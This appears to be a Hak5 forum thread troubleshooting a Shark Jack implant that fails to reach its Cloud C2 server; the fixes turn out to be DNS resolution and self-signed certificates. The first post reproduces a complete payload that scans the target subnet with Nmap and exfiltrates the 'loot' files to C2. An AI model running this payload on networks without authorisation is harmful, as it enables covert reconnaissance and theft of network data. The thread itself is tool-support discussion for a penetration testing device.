Jump to content

Sharkjack executes payloads but does not connect to C2


Peque

Recommended Posts

Posted

Hi Forum 

I've bought an essentialKit , and have the most of it running as expected. 

I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2
 

The Sharkjack is updated to to latest Firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the Loot are created etc. 
I can see that during execution of the payload, that the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud. 

As I can see - it should'n be an issue with my C2 Cloud - since I have Wifi Pineapple, lan Turtle and Squirrel running and connecting to C2 Cloud. 

How can I check this further, since as I can see - I can not SSH to the sharkjack during run of the payloads.  And have tried reconfiguring my C2 Cloud  settngs on the jack several times with out any luck. 

The Executed payload: 
 

#!/bin/bash
#
# Title:         Nmap Payload for Shark Jack w/ C2
# Author:        Hak5 (modifications from REDD)
# Version:       1.1
#
# All credit goes to Hak5 Team. I just through in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate! 
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.

C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap

# Setup loot directory, DHCP client, and determine subnet
LED SETUP                            
mkdir -p $LOOT_DIR                           
COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
NETMODE DHCP_CLIENT                          
while [ -z "$SUBNET" ]; do  
  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done                                                                                                                                                    
                                                                                                                                                        
# Scan network                                                                                                                                          
LED ATTACK    
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt

# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
  LED SPECIAL
  # Connect to Cloud C2
  C2CONNECT
  # Wait until Cloud C2 connection is established
  while ! pgrep cc-client; do sleep 1; done
  # Exfiltrate all test loot files
  FILES="$LOOT_DIR/*.txt"
  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
else
  # Exit script if not provisioned for C2
  LED R SOLID
  exit 1
fi

LED FINISH                                                                          
sleep 2 && halt

Can I Just disable the last 2 lines - so I can SSh into the jack to see what and if there's an error while trying to connect to my C2 Cloud 
Since everything else is working as intended - I do not get why I can't get this Sharkjack to deliever to my C2 Cloud. 

Any ideas of what is wrong 
/P

Posted

Not sure if I missed reading some info, but have you gotten the Shark to connect to C2 at all? Not specifically delivering loot, but that you can see it as a connected device in the C2 interface. You could try a payload that just connects as a DHCP client (with sshd started) to a network and ssh into it and try to connect to C2 and extract loot manually looking for errors. Does the cc-client error log in /tmp tell anything? How are you running your C2 server? Using https?

Posted

I have placed the device.config - in /etc/  

Yes - My C2 is running https. 
I have also tried the default payload --> with just should test this C2EXFIL - but still not getting anything ton my C2 Cloud. 

THe only thing i cc-client-error are these 3 lines repeating

[1646558183 !ERR     INITSYNC ]  Error in startup sync post
[1646558183 !ERR         MAIN ]  Device startup sync failed. Retrying... 
[1646558188 !ERR         CURL ]  Error posting update to server...

But other devices on the same network is working without problem. 

Well - Found the problem - Internal DNS 
Since this is just test setup at the moment, seperate network at home. 
/etc/resolv.conf --> only nameserver 127.0.0.1 
Adding my local DNS Server ( PFsense firewall) - and now I'm able to connect to the C2 Cloud. 
 

Extra: Is it possible to make it add this DNS server automatickly - as a failover DNS, so if the default dns - 127.0.0.1 does not resolve - then add a speficied extra DNS server

And thanks for the input - that gave me the answer
 

  • 1 year later...
Posted

Hi I am stuck here myself.  I have uploaded the device.config, ran C2CONNECT but when checking /tmp/cc-client-error.log I have the following:

[1679537734 !ERR     INITSYNC ]  Error in startup sync post
[1679537734 !ERR         MAIN ]  Device startup sync failed. Retrying...

Which just keeps repeating.  I had issues trying to UPDATE_FIRMWARE and UPDATE_PAYLOAD but was able to get those working properly by setting the date.  The SJC never checks in to C2 either.

Any help is appreciated, I have reviewed the forums and am striking out...:ph34r:

 

 

Posted
6 hours ago, dark_pyrro said:

Can you ping, for example, www.google.com from the Shark? Where is your C2 server located? Locally on your own network or accessible over internet?

Yes, I can ping my C2 instance, I can ping example.com and  8.8.8.8 or anything else from the SJC.  My C2 server is internet based.

  • 1 month later...
Posted

Hey all! Just wanted to drop in and note my own experience. All of the above applied to me, but one thing I modified is stopped using self-signed certificates with openssl. Instead, I modified the service as per the guidance below, to ensure I use Let'sEncrypt with the following switches enabled:

-hostname {hostname} -https

This allowed my SharkJack to quickly connect and transfer loot to the C2. It seems that it doesn't like self-signed certificates at all, which makes sense in hindsight.

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...